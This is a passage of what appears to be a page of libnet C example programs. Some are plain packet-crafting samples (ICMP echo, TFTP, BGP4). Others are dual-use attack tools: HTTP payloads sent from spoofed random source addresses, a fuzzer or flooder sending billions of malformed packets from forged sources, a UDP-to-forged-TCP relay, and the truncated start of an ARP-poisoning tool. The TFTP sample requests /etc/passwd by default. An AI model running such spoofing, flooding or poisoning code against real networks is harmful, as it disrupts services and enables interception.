                   strlen(l->device)))) || 
                    (address_list->addr == addr))
            {
                /* free the "user supplied device" - see libnet_init() */
                free(l->device);
                l->device =  strdup(address_list->device);
                goto good;
            }
        }
        if (i <= 0)
        {
            snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
                    "%s(): can't find interface for IP %s\n", __func__,
                    l->device);
	    goto bad;
        }
    }
    else
    {
        l->device = strdup(address_list->device);
    }

good:
    for (i = 0; i < c; i++)
    {
        free(al[i].device);
    }
    return (1);

bad:
    for (i = 0; i < c; i++)
    {
        free(al[i].device);
    }
    return (-1);
}
Example #14
0
int main(int argc, char *argv[])
{
    int c, i; 
    u_char *cp;
    libnet_t *l;
    libnet_ptag_t ip;
    libnet_ptag_t tcp;
    struct libnet_stats ls;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    u_char opt[20];
    char errbuf[LIBNET_ERRBUF_SIZE];
    FILE *dmf; 
    char *dms; 
    int pay_s;
    char *dmfn = "kw.txt";
    char *paybuf, *pp;
    u_char bt;
    char linebuf[MAXTEXT];

    /* Initialize the library.  Root priviledges are required.  */
    l = libnet_init(
            LIBNET_RAW4,                            /* injection type */
            NULL,                                   /* network interface */
            errbuf);                                /* errbuf */

    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    libnet_seed_prand(l);
    tcp = 0; 
    ip = 0;

    dst_ip = libnet_get_prand(LIBNET_PRu32);
    src_ip = libnet_get_prand(LIBNET_PRu32);
    src_prt = libnet_get_prand(LIBNET_PRu16);
    dst_prt = 80;			         /* http */		 

    while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF)
    {
        switch (c)
        {
         case 'd':
           if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
             {
                fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                exit(EXIT_FAILURE);
             }
           break;
         case 's':
           if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
             {
               fprintf(stderr, "Bad source IP address: %s\n", optarg);
               exit(EXIT_FAILURE);
             }
           break;
         case 'p':
           dst_prt = (u_short)atoi(optarg);
           printf("Dest port: %d\n", dst_prt); 
           break;
         case 'f':
           dmfn = optarg; 
           printf("File name: %s\n", dmfn); 
           break;
         default:
                exit(EXIT_FAILURE);
        }
    }



/* Read the keywords, dest IPs, src IPs , and construct http payload */ 

    if( (dmf = fopen(dmfn, "r")) == NULL) {
      fprintf(stderr, "Error opening the content file %s \n", dmfn); 
      exit(1);
    } /* end if */ 
 
    printf("Reading content ...\n");
    i = 0; 
    while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) )
     { 
       linebuf[i++] = c;
     }
    fclose(dmf);
    linebuf[i] = '\0'; 
    paybuf = linebuf;
    dms = (char *)malloc(strlen(paybuf)+1);  /* alloc mem */
    strcpy(dms, paybuf); 
    pay_s = strlen(dms); 
         /* ===== for message body debugging  */
         printf("Content read:\n");
         for (i=0; i < pay_s; i++) { 
            bt = *(dms + i); 
            printf(" %02X", bt); 
         }  
         printf("\n");
         /*=== */
     
   


/* Building TCP */
        tcp = libnet_build_tcp(
            src_prt,                                /* source port */
            dst_prt,                            /* destination port */
            libnet_get_prand(LIBNET_PRu32),
            libnet_get_prand(LIBNET_PRu32),
            0x18,            /* (PSH, ACK) */
            libnet_get_prand(LIBNET_PRu16),     /* window size */ 
            0,                                      /* checksum */
            0,                                      /* urgent pointer */
            LIBNET_TCP_H + pay_s,           /* packet length */
            dms,                                /* payload */
            pay_s,                              /* payload size */
            l,                                      /* libnet handle */
            tcp);                                   /* libnet id */

        if (tcp == -1) {
            fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
            goto bad;
        }

/* Building IP */
            
            ip = libnet_build_ipv4(
                LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
                0x00,                                          /* TOS */
                0,                                            /* IP ID */
                0x4000,                                          /* IP Frag */
                64,                                         /* TTL */
                IPPROTO_TCP,                                /* protocol */
                0,                                          /* checksum */
                src_ip,
                dst_ip,
                NULL,                                       /* payload */
                0,                                          /* payload size */
                l,                                          /* libnet handle */
                ip);                                         /* libnet id */

            if (ip == -1) {
             fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
             goto bad;
            }

/*  Write it to the wire. */
        c = libnet_write(l);
        if (c == -1) { 
            fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
            goto bad;
        } else {
            /* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
        }

   /*  usleep(20); slow down to conserve bandwidth */

    libnet_stats(l, &ls);
    fprintf(stderr, "Packets sent:  %ld\n"
                    "Packet errors: %ld\n"
                    "Bytes written: %ld\n",
                    ls.packets_sent, ls.packet_errors, ls.bytes_written);
    libnet_destroy(l);

    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    return (EXIT_FAILURE);
}
int main() {

	libnet_t *l;	/* libnet context */
	char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
	u_int32_t ip_addr;
	u_int16_t id, seq;
	int i;

	l = libnet_init(LIBNET_RAW4, NULL, errbuf);
	if ( l == NULL ) {
		fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
		exit(EXIT_FAILURE);
	}

	/* Generating a random id */

	libnet_seed_prand(l);
	id = (u_int16_t)libnet_get_prand(LIBNET_PR16);

	/* Getting destination IP address */

	printf("Destination IP address: ");
	scanf("%15s",ip_addr_str);

	ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);

	if ( ip_addr == -1 ) {
		fprintf(stderr, "Error converting IP address.\n");
		libnet_destroy(l);
		exit(EXIT_FAILURE);
	}

	/* Writing 4 packets */
	
	seq = 1;

	for ( i = 0; i < 4; i++ ) {

		/* Building the ICMP header */
		if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
				(seq + i), NULL, 0, l, 0) == -1 ) {
			fprintf(stderr, "Error building ICMP header: %s\n",\
					libnet_geterror(l));
			libnet_destroy(l);
			exit(EXIT_FAILURE);
		}

		/* Building the IP header */
		if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \
					LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\
					ip_addr, l) == -1 ) {
			fprintf(stderr, "Error building IP header: %s\n",\
					libnet_geterror(l));
			libnet_destroy(l);
			exit(EXIT_FAILURE);
		}

		if ( libnet_write(l) == -1 )
			fprintf(stderr, "Error writing packet: %s\n",\
					libnet_geterror(l));

		/* Clearing the packet */
		/* Comment this to see what happens when you rebuild headers
		 * without calling libnet_clear_packet() */
		libnet_clear_packet(l);

		/* Waiting 1 second between each packet */
		sleep(1);

	}

	libnet_destroy(l);
	return 0;
}
Example #16
0
int main()
{
	libnet_t *handle;
	char errbuf[LIBNET_ERRBUF_SIZE],ip_addr_str[16];
	u_int32_t ip_addr;
	u_int16_t id,seq;
	char payload[] = "libnet :D";
	int bytes_written;

	handle = libnet_init(LIBNET_RAW4,NULL,errbuf);

	if(handle == NULL)
	{
		fprintf(stderr,"libnet_init() failed: %s\n",errbuf);
		exit(EXIT_FAILURE);
	}
	
	libnet_seed_prand(handle);
	id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
	
	printf("Destination IP address: ");
	scanf("%15s",ip_addr_str);

	ip_addr = libnet_name2addr4(handle,ip_addr_str,LIBNET_DONT_RESOLVE);

	if(ip_addr == -1)
	{
		fprintf(stderr,"Error converting IP address.\n");
		libnet_destroy(handle);
		exit(EXIT_FAILURE);
	}
	
	seq = 1;

	if(libnet_build_icmpv4_echo(ICMP_ECHO,0,0,id,seq,\
				(u_int8_t *)payload,sizeof(payload),handle,0)==-1)
	{
		fprintf(stderr,"Error building ICMP header: %s\n",\
			libnet_geterror(handle));
		libnet_destroy(handle);
		exit(EXIT_FAILURE);
	}

	if(libnet_autobuild_ipv4(LIBNET_IPV4_H + \
				LIBNET_ICMPV4_ECHO_H + sizeof(payload),\
				IPPROTO_ICMP,ip_addr,handle) == -1)
	{
		fprintf(stderr,"Error building IP header: %s\n",\
				libnet_geterror(handle));
		libnet_destroy(handle);
		exit(EXIT_FAILURE);
	}

	bytes_written = libnet_write(handle);

	if(bytes_written != -1)
		printf("%d bytes written.\n",bytes_written);
	else
		fprintf(stderr,"Error writing packet: %s\n",\
				libnet_geterror(handle));

	libnet_destroy(handle);
	
	return 0;
}
Example #17
0
int
main(int argc, char **argv)
{
	int c;
	u_char *buf = NULL;
	u_short	*payload = NULL;
	u_int payload_s = 0;
	int packet_len = 0;

	struct ip *ip_hdr = NULL;
	struct udphdr *udp = NULL;
	u_short *ip_opts = NULL;

	/* libnet variables */
	char errbuf[LIBNET_ERRBUF_SIZE];
	libnet_t *l;
	char *device = NULL;

	/* Packet Variables */
	u_int32_t src_ip = 0, dst_ip = 0;
	u_short src_prt = 0, dst_prt = 0;
	u_int32_t src_ip_b = 0, src_ip_e = 0,dst_ip_b = 0, dst_ip_e = 0;
	u_int32_t src_len = 0,dst_len = 0;
	u_char tos, ttl, ver;
	u_int id, frag_off;
	u_int ipopt_len;


	/* Functionality Variables */
	int src_ip_rand = 0, dst_ip_rand = 0;
	struct timeval tv, tv2;
	float sec;
	unsigned int cx = 0;
	u_long max_pushed = 10240;		/* 10MB/sec */
	u_long num_to_send = 0xffffffff;	/* Send 4billion packets */
	u_long skip = 0; 			/* Skip how many packets */
	int printout = 0;			/* Debugging */
	int dst_port_rand = 0;
	int src_port_rand = 0;
	char *tmp_port = NULL;
	u_int repeat = 1;

	/* Defaults */
	float FragPct	=	10;
	float BadIPVer	=	10;
	float IPOpts	=	10;
	float UDPCksm	=	10;



	/* Not crypto strong randomness but we don't really care.  And this  *
	 * gives us a way to determine the seed while the program is running *
 	 * if we need to repeat the results				     */
	seed = getpid();
	
	/* Initialize libnet context, Root priviledges are required.*/ 
	l = libnet_init(
            LIBNET_RAW4_ADV,                        /* injection type */
            device,                                 /* network interface */
            errbuf);                                /* error buffer */

	if (l == NULL) {
	  fprintf(stderr, "libnet_init() failed: %s", errbuf);
	  exit( -1 );
	}
	

	while((c = getopt(argc, argv, "hd:s:a:b:y:z:r:m:k:Dp:V:F:I:U:vx:l:")) != EOF) {
	  switch (c) {
	   case 'h':
		usage(argv[0]);
		exit(0);
		break;
	   case 'd':
		dst_port_rand = 1;
		if ( (tmp_port = index(optarg, ',')) != NULL ) {
			*tmp_port++ = '\0';
			dst_port_rand = 0;
			dst_prt = htons((u_int) atol(tmp_port));
		}
		if ( strcmp(optarg, "rand") == 0 ) {
			printf("Using random dest IP's\n");
			dst_ip = 1;	/* Just to pass sanity checks */
			dst_ip_rand = 1;
			break;
		}
		if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
			fprintf(stderr, "Bad dest IP\n");
			exit( -1 );
		}
		break;
	  case 'a':
		  if ((src_ip_b = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
			fprintf(stderr, "Bad source begain IP\n");
			exit( -1 );
		}

		  break;
	  case 'b':
		  if ((dst_ip_b = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
			fprintf(stderr, "Bad source begain IP\n");
			exit( -1 );
		}

		  break;
	  case 'y':
		  if ((src_ip_e = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
			fprintf(stderr, "Bad source begain IP\n");
			exit( -1 );
		}

		  break;
	  case 'z':
		  if ((dst_ip_e = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
			fprintf(stderr, "Bad source begain IP\n");
			exit( -1 );
		}

		  break;
	  case 's':
		src_port_rand = 1;
		if ( (tmp_port = index(optarg, ',')) != NULL ) {
			*tmp_port++ = '\0';
			src_port_rand = 0;
			src_prt = htons((u_int) atol(tmp_port));
		}
		if ( strcmp(optarg, "rand") == 0 ) {
			printf("Using random source IP's\n");
			src_ip = 1;	/* Just to pass sanity checks */
			src_ip_rand = 1;
			break;
		}
		if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
			fprintf(stderr, "Bad source IP\n");
			exit( -1 );
		}
		break;
	   case 'r':
		seed = atoi(optarg);
		break;
	   case 'm':
		max_pushed = atol(optarg);
		break;
	   case 'k':
		skip = atol(optarg);
		printf("Will not transmit first %li packets.\n", skip);
		break;
	   case 'D':
		printout++;
		break;
	   case 'p':
		num_to_send = atoi(optarg);
		break;
	   case 'V':
		BadIPVer = atof(optarg);
		break;
	   case 'F':
		FragPct = atof(optarg);
		break;
	   case 'I':
		IPOpts = atof(optarg);
		break;
	   case 'U':
		UDPCksm = atof(optarg);
		break;
	   case 'x':
		repeat = atoi(optarg);
		break;
	   case 'l':
  		payload_s = atoi(optarg);
		break;
	   case 'v':
		printf("Version %s\n", VERSION);
		exit(0);
	   }
	}

	if(src_ip_b && src_ip_e)
	{
		if(htonl(src_ip_e) > htonl(src_ip_b))
		{
			src_len = htonl(src_ip_e) - htonl(src_ip_b);
		}
		else
		{
			src_len = htonl(src_ip_b) - htonl(src_ip_e);
		}
	}
	if(dst_ip_b && dst_ip_e)
	{
		if(htonl(dst_ip_e) > htonl(dst_ip_b))
			dst_len = htonl(dst_ip_e) - htonl(dst_ip_b);
		else
			dst_len = htonl(dst_ip_b) - htonl(dst_ip_e);
	}

	
	if ( !src_ip || !dst_ip ) {
		usage(argv[0]);
		exit(EXIT_FAILURE);
	}

	printf("Compiled against Libnet %s\n", LIBNET_VERSION);
	printf("Installing Signal Handlers.\n");
	if ( signal(SIGTERM, &sighandler) == SIG_ERR )
		printf("Failed to install signal handler for SIGTERM\n");
	if ( signal(SIGINT, &sighandler) == SIG_ERR )
		printf("Failed to install signal handler for SIGINT\n");
	if ( signal(SIGQUIT, &sighandler) == SIG_ERR )
		printf("Failed to install signal handler for SIGQUIT\n");

	printf("Seeding with %i\n", seed);
	srand(seed);
	max_pushed *= 1024;

	if ( src_port_rand )
		printf("Using random source ports.\n");
	if ( dst_port_rand )
		printf("Using random destination ports.\n");

	if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
		perror("malloc: ");
		exit( -1 );
	}


	if ( max_pushed >= 10000000 )
	 	printf("No Maximum traffic limiter\n");
	else printf("Maximum traffic rate = %.2f k/s\n", max_pushed/1024.0 );

	printf("Bad IP Version\t= %.0f%%\t\t", BadIPVer);
	printf("IP Opts Pcnt\t= %.0f%%\n", IPOpts);

	printf("Frag'd Pcnt\t= %.0f%%\t\t", FragPct);
	printf("Bad UDP Cksm\t= %.0f%%\n", UDPCksm);
	printf("\n");


	/* Drop them down to floats so we can multiply and not overflow */
	BadIPVer	/= 100;
	FragPct		/= 100;
	IPOpts		/= 100;
	UDPCksm		/= 100;


	/*************
 	 * Main Loop *
 	 *************/
	gettimeofday(&tv, NULL);
	gettimeofday(&starttime, NULL);

	for(acx = 0; acx < num_to_send; acx++) {
		packet_len = IP_H + UDP_H;
	
		tos	= RAND8;
		id	= acx & 0xffff;
		ttl	= RAND8;

		if ( rand() <= (RAND_MAX * FragPct) )
			frag_off = RAND16;
		else	frag_off = 0;

		/* We're not going to pad IP Options */
		if ( rand() <= (RAND_MAX * IPOpts) ) {
			ipopt_len = 10 * (rand() / (float) RAND_MAX);
			ipopt_len = ipopt_len << 1;
			ip_opts = (u_short *) buf;
			packet_len += ipopt_len << 1;

			for ( cx = 0; cx < ipopt_len; cx++ )
				ip_opts[cx] = RAND16;
			udp = (struct udphdr *) (buf + IP_H + (ipopt_len << 1));
			ipopt_len = ipopt_len >> 1;
		} else {
Example #18
0
int main(int argc, char *argv[]) {
    if(argc < 5) {
        printf("Usage: ./out device local_port remote_addr remote_port\n");
        return -1;
    }

    char *interface = argv[1];
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_ptag_t ip_tag = 0, tcp_tag = 0;
    u_short proto = IPPROTO_TCP;
    int packet_size;
    libnet_t *libnet_handler = libnet_init(LIBNET_RAW4_ADV, interface, errbuf);
    if(NULL == libnet_handler) {
        printf("libnet init failed: %s\n", errbuf);
        exit(1);
    }

    u_long dst_ip = libnet_name2addr4(libnet_handler, argv[3], LIBNET_RESOLVE);
    u_long src_ip = libnet_name2addr4(libnet_handler, "0.0.0.0", LIBNET_RESOLVE);

    fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    struct sockaddr_in addr;
    socklen_t slen = sizeof(addr);
    memset((void *)&addr, 0, slen);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atoi(argv[2]));
    inet_aton("0.0.0.0", &addr.sin_addr);
    bind(fd, (const struct sockaddr*)&addr, slen);

    u_char buf[BUF_SIZE];
    ssize_t recvlen;

    while(1) {
        recvlen = recvfrom(fd, buf, BUF_SIZE, 0, NULL, NULL);
        tcp_tag = libnet_build_tcp(
            atoi(argv[2]),                    /* 源端口 */
            atoi(argv[4]),                    /* 目的端口 */
            8888,                    /* 序列号 */
            8889,                    /* 确认号 */
            TH_PUSH | TH_ACK,        /* Control flags */
            14600,                    /* 窗口尺寸 */
            0,                        /* 校验和,0为自动计算 */
            0,                        /* 紧急指针 */
            LIBNET_TCP_H + recvlen, /* 长度 */
            buf,                    /* 负载内容 */
            recvlen,                /* 负载内容长度 */
            libnet_handler,                    /* libnet句柄 */
            tcp_tag                        /* 新建包 */
        );
        if (tcp_tag == -1) {
            printf("libnet_build_tcp failure\n");
            continue;
        };

        /* 构造IP协议块,返回值是新生成的IP协议快的一个标记 */
        ip_tag = libnet_build_ipv4(
            LIBNET_IPV4_H + LIBNET_TCP_H + recvlen, /* IP协议块的总长,*/
            0, /* tos */
            (u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
            0, /* frag 片偏移 */
            (u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
            proto, /* 上层协议 */
            0, /* 校验和,此时为0,表示由Libnet自动计算 */
            src_ip, /* 源IP地址,网络序 */
            dst_ip, /* 目标IP地址,网络序 */
            NULL, /* 负载内容或为NULL */
            0, /* 负载内容的大小*/
            libnet_handler, /* Libnet句柄 */
            ip_tag /* 协议块标记可修改或创建,0表示构造一个新的*/
        );
        if (ip_tag == -1) {
            printf("libnet_build_ipv4 failure\n");
            return (-4);
        };

        packet_size = libnet_write(libnet_handler);
        //libnet_clear_packet(libnet_handler);
    }

    libnet_destroy(libnet_handler);
}
Example #19
0
int main(int argc, char *argv[])
{
    int c;
    libnet_t *l;
    char *device = "eth0";
    char *dst = NULL;
    char  src[HOST_NAME_MAX+1];
    u_long src_ip, dst_ip;
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_ptag_t ip_ptag = 0;
    char *cur_host;
    int   valid;
    u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5};
    u_long payload_s = 8;
    int  i;

   
    while ((c = getopt(argc, argv, "d:i:h")) != EOF)
    {
        switch (c)
        {
            case 'd':
		        dst = optarg;
                break;

	        case 'i':
		        device = optarg;
		        break;

	        case 'h':
		        usage(argv[0]);
		        exit(EXIT_SUCCESS);

            default:
                exit(EXIT_FAILURE);
        }
    }


    if (!dst) {
       usage(argv[0]);
       exit(EXIT_FAILURE); 
    }
    
    gethostname(src, HOST_NAME_MAX);
    cur_host = valid_hosts[0];
    for (i=0, valid=0; cur_host; i++) {
      if (strstr(cur_host, src)) {
        valid = 1;
	    break;
      }
      cur_host = valid_hosts[i];
    }
    
    if (!valid) {
      fprintf(stderr, "Uh uh. I don't think so.\n");
      exit(EXIT_FAILURE); 
    }
    
    
    l = libnet_init(
	    LIBNET_RAW4,                            /* injection type */
	    device,                                 /* network interface */
        errbuf);                                /* error buffer */

    

    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE); 
    }

    if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1)
    {
	  fprintf(stderr, "Bad destination IP address: %s\n", dst);
	  exit(EXIT_FAILURE);
    }
    
    if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1)
    {
	  fprintf(stderr, "Bad source IP address: %s\n", src);
	  exit(EXIT_FAILURE);
    }
    

    
    ip_ptag = libnet_build_ipv4(
        LIBNET_IPV4_H + payload_s,                  /* length */
        0,                                          /* TOS */
        242,                                        /* IP ID */
        0,                                          /* IP Frag */
        64,                                         /* TTL */
        IPPROTO_RESTART,                            /* protocol */
        0,                                          /* checksum */
        src_ip,                                     /* source IP */
        dst_ip,                                     /* destination IP */
        payload,                                    /* payload */
        payload_s,                                  /* payload size */
        l,                                          /* libnet handle */
        ip_ptag);                                   /* libnet id */
        
        
    if (ip_ptag == -1)
    {
        fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
        goto bad;
    }

   
    c = libnet_write(l);
    if (c == -1)
    {
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        goto bad;
    }
    else
    {
        fprintf(stderr, "Sent restart packet to %s.\n", dst);
    }

    libnet_destroy(l);
    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    return (EXIT_FAILURE);
}
Example #20
0
File: tftp.c Project: 7h3rAm/libnet
int
main(int argc, char *argv[])
{
    int c;
    libnet_t *l;
    u_long src_ip, dst_ip;
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_ptag_t udp = 0, ip = 0;
    char *filename = "/etc/passwd";
    char mode[] = "netascii";
    u_char *payload = NULL;
    u_int payload_s = 0;
    

    printf("libnet 1.1 packet shaping: UDP + payload[raw] == TFTP\n");

    /*
     *  Initialize the library.  Root priviledges are required.
     */
    l = libnet_init(
	    LIBNET_RAW4,                  /* injection type */
            NULL,                         /* network interface */
            errbuf);                      /* error buffer */

    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE); 
    }

    src_ip  = 0;
    dst_ip  = 0;
    while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
    {
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 'd':
                if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
		    goto bad;
                }
                break;

            case 's':
                if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
		    goto bad;
                }
                break;

	    case 'p':
		filename = optarg;
		break;

            default:
		fprintf(stderr, "unkown option [%s]: bye bye\n", optarg);
		goto bad;

        }
    }

    if (!src_ip || !dst_ip)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    /* 
     * build payload
     *
     *      2 bytes     string    1 byte     string   1 byte
     *       ------------------------------------------------
     *      | Opcode |  Filename  |   0  |    Mode    |   0  |
     *       ------------------------------------------------
     *
     */
    payload_s = 2 + strlen(filename) + 1 + strlen(mode) + 1;
    payload = malloc(sizeof(char)*payload_s);
    if (!payload)
    {
        fprintf(stderr, "malloc error for payload\n");
        goto bad;
    }
    memset(payload, 0, payload_s);
    payload[1] = 1; /* opcode - GET */
    memcpy(payload + 2, filename, strlen(filename));
    memcpy(payload + 2 +  strlen(filename) + 1 , mode, strlen(mode));
    
    /*
     * Build pblocks
     */
    udp = libnet_build_udp(
	0x1234,                           /* source port */
	69,                               /* destination port */
	LIBNET_UDP_H + payload_s,         /* packet length */
	0,                                /* checksum */
	payload,                          /* payload */
	payload_s,                        /* payload size */
	l,                                /* libnet handle */
	0);                               /* libnet id */
    if (udp == -1)
    {
	fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
	goto bad;
    }

    ip = libnet_build_ipv4(
        LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length - dont forget the UDP's payload */
        0,                                /* TOS */
        0x4242,                           /* IP ID */
        0,                                /* IP Frag */
        0x42,                             /* TTL */
        IPPROTO_UDP,                      /* protocol */
        0,                                /* checksum */
        src_ip,                           /* source IP */
        dst_ip,                           /* destination IP */
        NULL,                             /* payload (already in UDP) */
        0,                                /* payload size */
        l,                                /* libnet handle */
        0);                               /* libnet id */
    if (ip == -1)
    {
        fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
        goto bad;
    }

    /*
     *  Write it to the wire.
     */
    c = libnet_write(l);
    if (c == -1)
    {
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        goto bad;
    }
    else
    {
        fprintf(stderr, "Wrote %d byte TFTP packet; check the wire.\n", c);
    }

    libnet_destroy(l);
    free(payload);
    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    free(payload);
    return (EXIT_FAILURE);
}
Example #21
0
int
main(int argc, char *argv[])
{
    int c;
    libnet_t *l;
    u_long src_ip, dst_ip, length;
    libnet_ptag_t t = 0;
    char errbuf[LIBNET_ERRBUF_SIZE];
    u_char *payload = NULL;
    u_long payload_s = 0;
    u_char marker[LIBNET_BGP4_MARKER_SIZE];
    u_char type;

    printf("libnet 1.1 packet shaping: BGP4 hdr + payload[raw]\n");

    l = libnet_init(
            LIBNET_RAW4,                            /* injection type */
            NULL,                                   /* network interface */
            errbuf);                                /* error buffer */

    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE); 
    }

    src_ip  = 0;
    dst_ip  = 0;
    memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
    type = 0;

    while ((c = getopt(argc, argv, "d:s:t:m:p:")) != EOF)
    {
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 'd':
                if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;

            case 's':
                if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;

	    case 'm':
		memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE);
		break;

	    case 't':
		type = atoi(optarg);
		break;

	    case 'p':
		payload = (u_char *)optarg;
		payload_s = strlen((char *)optarg);
		break;

            default:
                exit(EXIT_FAILURE);
        }
    }

    if (!src_ip || !dst_ip)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }


    length = LIBNET_BGP4_HEADER_H + payload_s;
    t = libnet_build_bgp4_header(
	marker,                                     /* marker */   
	length,                                     /* length */
	type,                                       /* message type */
        payload,                                    /* payload */
        payload_s,                                  /* payload size */
        l,                                          /* libnet handle */
        0);                                         /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
        goto bad;
    }

    length+=LIBNET_TCP_H;
    t = libnet_build_tcp(
        0x6666,                                     /* source port */
        179,                                        /* destination port */
        0x01010101,                                 /* sequence number */
        0x02020202,                                 /* acknowledgement num */
        TH_SYN,                                     /* control flags */
        32767,                                      /* window size */
        0,                                          /* checksum */
        0,                                          /* urgent pointer */
	length,                                     /* TCP packet size */
        NULL,                                       /* payload */
        0,                                          /* payload size */
        l,                                          /* libnet handle */
        0);                                         /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
        goto bad;
    }

    length+=LIBNET_IPV4_H;
    t = libnet_build_ipv4(
        length,                                     /* length */
        0,                                          /* TOS */
        242,                                        /* IP ID */
        0,                                          /* IP Frag */
        64,                                         /* TTL */
        IPPROTO_TCP,                                /* protocol */
        0,                                          /* checksum */
        src_ip,                                     /* source IP */
        dst_ip,                                     /* destination IP */
        NULL,                                       /* payload */
        0,                                          /* payload size */
        l,                                          /* libnet handle */
        0);                                         /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
        goto bad;
    }

    /*
     *  Write it to the wire.
     */
    c = libnet_write(l);
    if (c == -1)
    {
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        goto bad;
    }
    else
    {
        fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
    }

    libnet_destroy(l);
    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    return (EXIT_FAILURE);
}
Example #22
0
int
main(int argc, char *argv[])
{
	extern char *optarg;
	extern int optind;
	char pcap_ebuf[PCAP_ERRBUF_SIZE];
	char libnet_ebuf[LIBNET_ERRBUF_SIZE];
	int c;
	int n_scan_hosts = 0;
	char *scan_prefix = NULL;
	int scan_prefix_length = 32;
	char *cleanup_src = NULL;
	in_addr_t target_addr;

	intf = NULL;
	poison_reverse = 0;
	poison_mesh = 0;
	n_hosts = 0;

	/* allocate enough memory for target list */
	hosts = calloc( argc+1, sizeof(struct host) );

	while ((c = getopt(argc, argv, "vrmi:s:t:c:h?V")) != -1) {
		switch (c) {
		case 'v':
			verbose = 1;
			break;
		case 'i':
			intf = optarg;
			break;
		case 't':
			target_addr = libnet_name2addr4(l, optarg, LIBNET_RESOLVE);
			if (target_addr == -1) {
				usage();
			} else {
				host_add(target_addr, HOST_TARGET);
			}
			break;
		case 'r':
			poison_reverse = 1;
			break;
		case 'm':
			poison_mesh = 1;
			break;
		case 's':
			scan_prefix = strchr(optarg, '/');
